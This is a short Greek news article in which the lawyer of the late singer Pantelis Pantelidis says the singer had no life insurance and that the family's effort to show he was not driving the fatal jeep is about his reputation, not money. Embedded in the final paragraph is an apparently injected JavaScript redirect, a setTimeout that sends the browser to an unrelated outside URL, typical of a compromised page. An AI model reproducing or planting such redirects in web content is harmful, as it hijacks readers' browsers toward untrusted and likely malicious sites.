Ανατροπή στην υπόθεση Παντελίδη: Δεν είχε ασφάλεια ζωής – Ηθικός ο αγώνας της οικογένειας

0
14

 

Την αποκάλυψη ότι ο Παντελής Παντελίδης δεν είχε ασφάλεια ζωής οπότε η οικογένειά του δεν θα εισπράξει το φημολογούμενο 1 εκατομμύριο μετά τον τραγικό χαμό του στην άσφαλτο κανει ο δικηγόρος της οικογένειας.

Ο δικηγόρος της οικογένειας του τραγουδιστή ξεκαθαρίζει, σύμφωνα με την εφημερίδα Freddo, ότι παρά τα όσα ακούγονται και γράφονται ο Παντελής Παντελίδης δεν είχε ασφάλεια ζωής, δεν θα εισπράξει η οικογένειά του κανένα ποσό, όπως το ένα εκατομμύριο ευρώ όπως ακούγεται, δεν έχει κανέναν οικονομικό λόγο η οικογένειά του να προσπαθεί να αποδείξει ότι δεν ήταν εκείνος ο οδηγός του μοιραίου τζιπ.

O δικηγόρος μάλιστα της οικογένειας κ. Λυκούδης, αναφέρει «ο Παντελής Παντελίδης, σας λέω μετά πλήρους βεβαιότητας δεν είχε κάνει καμία ασφάλεια ζωής. Το μόνο που είχε ο Παντελής ήταν μια κάρτα νοσηλείας».

Μάλιστα όπως τονίζει ο αγώνας της οικογένειάς του είναι ηθικός, θέλουν επιχειρώντας να αποδείξουν ότι δεν ήταν εκείνος ο οδηγός να αποκαταστήσουν την υστεροφημία του και να δικαιώσουν τον Παντελή. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here